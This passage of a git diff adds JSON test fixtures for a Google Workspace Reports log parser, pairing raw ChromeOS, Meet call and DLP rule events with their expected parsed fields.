"CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-08T13:17:42.050000Z", + "cloud": { + "account": { + "id": "C01x70000" + } + }, + "device": { + "manufacturer": "Linux Foundation", + "model": { + "identifier": "0x2", + "name": "2.0 root hub" + } + }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097979777777" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json new file mode 100644 index 000000000..990b7f47c --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json @@ -0,0 +1,46 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "event": { + "action": "CHROME_OS_LOGIN_EVENT", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_KIOSK_SESSION_LOGIN", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-08T13:20:40Z", + "cloud": { + "account": { + "id": "C01x7c000" + } + }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097973333333333" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_end_call.json b/Google Cloud/google-report/tests/test_end_call.json new file mode 100644 index 000000000..21a51a926 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call.json @@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T12:07:37.366000Z", + "client": { + "geo": { + "country_iso_code": "FR", + "region_name": "Paris" + } + }, + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "ABCDEFGHIJ" + } + } + }, + "network": { + "application": "meet", + "transport": "udp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_end_call_no_ip.json b/Google Cloud/google-report/tests/test_end_call_no_ip.json new file mode 100644 index 000000000..de33d47c4 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call_no_ip.json @@ -0,0 +1,44 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T11:32:12.301000Z", + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "BUSOHGFTVB" + } + } + }, + "network": { + "application": "meet", + "transport": "tcp" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_meet_sample1.json b/Google Cloud/google-report/tests/test_meet_sample1.json index 406a0943c..fd7b1fa66 100644 --- a/Google Cloud/google-report/tests/test_meet_sample1.json +++ b/Google Cloud/google-report/tests/test_meet_sample1.json @@ -41,13 +41,20 @@ "transport": "udp" }, "related": { + "ip": [ + "5555:333:333:5555:5555:5555:5555:5555" + ], "user": [ "jone.doe" ] }, + "source": { + "address": "5555:333:333:5555:5555:5555:5555:5555", + "ip": "5555:333:333:5555:5555:5555:5555:5555" + }, "user": { "domain": "test.com", - "email": "jone.doe@test.com", + "email": "joe.done@test.com", "id": "1098488062555", "name": "jone.doe" } diff --git a/Google Cloud/google-report/tests/test_rules_sample_1.json b/Google Cloud/google-report/tests/test_rules_sample_1.json new file mode 100644 index 000000000..3f7ef889b --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_1.json @@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "action_complete", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "113328670183616666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_rules_sample_2.json b/Google Cloud/google-report/tests/test_rules_sample_2.json new file mode 100644 index 000000000..f7a1e9bf9 --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_2.json @@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro 